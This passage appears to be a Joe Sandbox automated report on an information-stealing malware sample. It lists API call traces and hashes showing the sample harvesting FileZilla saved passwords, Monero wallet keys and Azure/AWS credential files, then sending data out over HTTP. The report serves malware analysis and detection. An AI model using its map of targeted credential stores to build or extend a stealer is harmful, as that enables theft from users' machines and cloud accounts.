                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • GetProcessHeap.KERNEL32(00000000,000F423F,005E0DBA,005E0DB7,005E0DB6,005E0DB3), ref: 005D0362
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D0369
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 005D0385
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0393
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 005D03CF
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D03DD
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 005D0419
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0427
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 005D0463
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0475
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0502
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D051A
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D0532
                        • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D054A
                        • lstrcat.KERNEL32(?,browser: FileZilla), ref: 005D0562
                        • lstrcat.KERNEL32(?,profile: null), ref: 005D0571
                        • lstrcat.KERNEL32(?,url: ), ref: 005D0580
                        • lstrcat.KERNEL32(?,00000000), ref: 005D0593
                        • lstrcat.KERNEL32(?,005E1678), ref: 005D05A2
                        • lstrcat.KERNEL32(?,00000000), ref: 005D05B5
                        • lstrcat.KERNEL32(?,005E167C), ref: 005D05C4
                        • lstrcat.KERNEL32(?,login: ), ref: 005D05D3
                        • lstrcat.KERNEL32(?,00000000), ref: 005D05E6
                        • lstrcat.KERNEL32(?,005E1688), ref: 005D05F5
                        • lstrcat.KERNEL32(?,password: ), ref: 005D0604
                        • lstrcat.KERNEL32(?,00000000), ref: 005D0617
                        • lstrcat.KERNEL32(?,005E1698), ref: 005D0626
                        • lstrcat.KERNEL32(?,005E169C), ref: 005D0635
                        • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,005E0DB2), ref: 005D068E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 1942843190-555421843
                        • Opcode ID: 9f1cefd74fa062898847578ffc1889e626c1d3359842ec91676a6f574f0a2e2a
                        • Instruction ID: a0b8175252deeac3b991fdd994f52b5a444cc5ef691e1741ef7c84d8459f8a4c
                        • Opcode Fuzzy Hash: 9f1cefd74fa062898847578ffc1889e626c1d3359842ec91676a6f574f0a2e2a
                        • Instruction Fuzzy Hash: 8FD188719002499BCB18FBF8CD8AEEE7B38FF54300F40851AF502A6291DF74AA45DB65
                        Function 005C5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 005C4839
                          • Part of subcall function 005C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 005C4849
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005C59F8
                        • StrCmpCA.SHLWAPI(?,014B0DB0), ref: 005C5A13
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 005C5B93
                        • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014B0E50,00000000,?,014AF840,00000000,?,005E1A1C), ref: 005C5E71
                        • lstrlen.KERNEL32(00000000), ref: 005C5E82
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005C5E93
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005C5E9A
                        • lstrlen.KERNEL32(00000000), ref: 005C5EAF
                        • lstrlen.KERNEL32(00000000), ref: 005C5ED8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 005C5EF1
                        • lstrlen.KERNEL32(00000000,?,?), ref: 005C5F1B
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 005C5F2F
                        • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 005C5F4C
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FB0
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FBD
                        • HttpOpenRequestA.WININET(00000000,014B0D10,?,014B0588,00000000,00000000,00400100,00000000), ref: 005C5BF8
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • InternetCloseHandle.WININET(00000000), ref: 005C5FC7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 874700897-2180234286
                        • Opcode ID: e71ca3db38200937afafaad1c96a13816c77b155f2c2349b5e4be998c875916c
                        • Instruction ID: 1e9eaa4dfef408164e72faf733744ab988606440bf2b0861190d2187a2f8c594
                        • Opcode Fuzzy Hash: e71ca3db38200937afafaad1c96a13816c77b155f2c2349b5e4be998c875916c
                        • Instruction Fuzzy Hash: 1A124272820119ABCB28EBA4DC99FEF7738BF54700F40419BF50662191EF702A89CF55
                        Function 005CCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CCF83
                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 005CD0C7
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005CD0CE
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD208
                        • lstrcat.KERNEL32(?,005E1478), ref: 005CD217
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD22A
                        • lstrcat.KERNEL32(?,005E147C), ref: 005CD239
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD24C
                        • lstrcat.KERNEL32(?,005E1480), ref: 005CD25B
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD26E
                        • lstrcat.KERNEL32(?,005E1484), ref: 005CD27D
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD290
                        • lstrcat.KERNEL32(?,005E1488), ref: 005CD29F
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD2B2
                        • lstrcat.KERNEL32(?,005E148C), ref: 005CD2C1
                        • lstrcat.KERNEL32(?,00000000), ref: 005CD2D4
                        • lstrcat.KERNEL32(?,005E1490), ref: 005CD2E3
                          • Part of subcall function 005DA820: lstrlen.KERNEL32(005C4F05,?,?,005C4F05,005E0DDE), ref: 005DA82B
                          • Part of subcall function 005DA820: lstrcpy.KERNEL32(005E0DDE,00000000), ref: 005DA885
                        • lstrlen.KERNEL32(?), ref: 005CD32A
                        • lstrlen.KERNEL32(?), ref: 005CD339
                          • Part of subcall function 005DAA70: StrCmpCA.SHLWAPI(014A8BC8,005CA7A7,?,005CA7A7,014A8BC8), ref: 005DAA8F
                        • DeleteFileA.KERNEL32(00000000), ref: 005CD3B4
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                        • String ID:
                        • API String ID: 1956182324-0
                        • Opcode ID: 40bcaccdda318fa95a42673c73152cf4ff6ee2e704d1b8f4d407f80909f02d58
                        • Instruction ID: 1b9b8a1663c1012c482807c4d0e2e7ab55f37304c36528ac096019fc502f9f8e
                        • Opcode Fuzzy Hash: 40bcaccdda318fa95a42673c73152cf4ff6ee2e704d1b8f4d407f80909f02d58
                        • Instruction Fuzzy Hash: 0DE17371910109ABCB18EBA4DD9AEEF7B38BF54300F00415AF507B3291EE35AE45DB66
                        Function 005CC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,014AEFB0,00000000,?,005E144C,00000000,?,?), ref: 005CCA6C
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005CCA89
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 005CCA95
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 005CCAA8
                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 005CCAD9
                        • StrStrA.SHLWAPI(?,014AEF08,005E0B52), ref: 005CCAF7
                        • StrStrA.SHLWAPI(00000000,014AEED8), ref: 005CCB1E
                        • StrStrA.SHLWAPI(?,014AF408,00000000,?,005E1458,00000000,?,00000000,00000000,?,014A8C58,00000000,?,005E1454,00000000,?), ref: 005CCCA2
                        • StrStrA.SHLWAPI(00000000,014AF5A8), ref: 005CCCB9
                          • Part of subcall function 005CC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 005CC871
                          • Part of subcall function 005CC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 005CC87C
                        • StrStrA.SHLWAPI(?,014AF5A8,00000000,?,005E145C,00000000,?,00000000,014A8AA8), ref: 005CCD5A
                        • StrStrA.SHLWAPI(00000000,014A89D8), ref: 005CCD71
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B46), ref: 005CC943
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B47), ref: 005CC957
                          • Part of subcall function 005CC820: lstrcat.KERNEL32(?,005E0B4E), ref: 005CC978
                        • lstrlen.KERNEL32(00000000), ref: 005CCE44
                        • CloseHandle.KERNEL32(00000000), ref: 005CCE9C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                        • String ID:
                        • API String ID: 3744635739-3916222277
                        • Opcode ID: f6ba9961e6a87f758b48420bb7b1d20f0a28ad40c79600df3a175b90eaa14edd
                        • Instruction ID: a86a547c0a97ba502d1c216397e9ac2e6df3f422c485abcc4cd9b164b3d81fce
                        • Opcode Fuzzy Hash: f6ba9961e6a87f758b48420bb7b1d20f0a28ad40c79600df3a175b90eaa14edd
                        • Instruction Fuzzy Hash: 78E11372900149ABDB28EBA8DC95FEF7B78BF54300F40415BF50667291EF306A4ACB65
                        Function 005D8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • RegOpenKeyExA.ADVAPI32(00000000,014ABBD0,00000000,00020019,00000000,005E05B6), ref: 005D83A4
                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 005D8426
                        • wsprintfA.USER32 ref: 005D8459
                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 005D847B
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D848C
                        • RegCloseKey.ADVAPI32(00000000), ref: 005D8499
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                        • String ID: - $%s\%s$?
                        • API String ID: 3246050789-3278919252
                        • Opcode ID: 63ae54b339333af73de01441abe952be700389a81b1bdbad9b58a45f020dbddf
                        • Instruction ID: 1223d434f4591c0e4a23b85a7f966247ffe641b06005ff94273f845df85e30f8
                        • Opcode Fuzzy Hash: 63ae54b339333af73de01441abe952be700389a81b1bdbad9b58a45f020dbddf
                        • Instruction Fuzzy Hash: 968110719102189BDB68DB54CC95FEA7BB8FF48700F0086DAE509A6280DF71AF85CF95
                        Function 005D4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 005D8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4DB0
                        • lstrcat.KERNEL32(?,\.azure\), ref: 005D4DCD
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D492C
                          • Part of subcall function 005D4910: FindFirstFileA.KERNEL32(?,?), ref: 005D4943
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4E3C
                        • lstrcat.KERNEL32(?,\.aws\), ref: 005D4E59
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FDC), ref: 005D4971
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E0FE0), ref: 005D4987
                          • Part of subcall function 005D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 005D4B7D
                          • Part of subcall function 005D4910: FindClose.KERNEL32(000000FF), ref: 005D4B92
                        • lstrcat.KERNEL32(?,00000000), ref: 005D4EC8
                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 005D4EE5
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D49B0
                          • Part of subcall function 005D4910: StrCmpCA.SHLWAPI(?,005E08D2), ref: 005D49C5
                          • Part of subcall function 005D4910: wsprintfA.USER32 ref: 005D49E2
                          • Part of subcall function 005D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 005D4A1E
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,014B0D70), ref: 005D4A4A
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,005E0FF8), ref: 005D4A5C
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,?), ref: 005D4A70
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,005E0FFC), ref: 005D4A82
                          • Part of subcall function 005D4910: lstrcat.KERNEL32(?,?), ref: 005D4A96
                          • Part of subcall function 005D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 005D4AAC
                          • Part of subcall function 005D4910: DeleteFileA.KERNEL32(?), ref: 005D4B31
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                        • API String ID: 949356159-974132213
                        • Opcode ID: 1da96b20ffa33b32e95394bf9e1581681fed16f99eb9f5a4421e65ca7f43315f
                        • Instruction ID: 314da0f1f71ee86508b60853d859b7a0ebc2b16fe1907282aa0d4c2e1ab529f2
                        • Opcode Fuzzy Hash: 1da96b20ffa33b32e95394bf9e1581681fed16f99eb9f5a4421e65ca7f43315f
                        • Instruction Fuzzy Hash: 92419579A4024867CB64F760EC5BFEE3B38BB64700F404495B585661C2FEB197C98B92
                        Function 005D9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 005D906C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
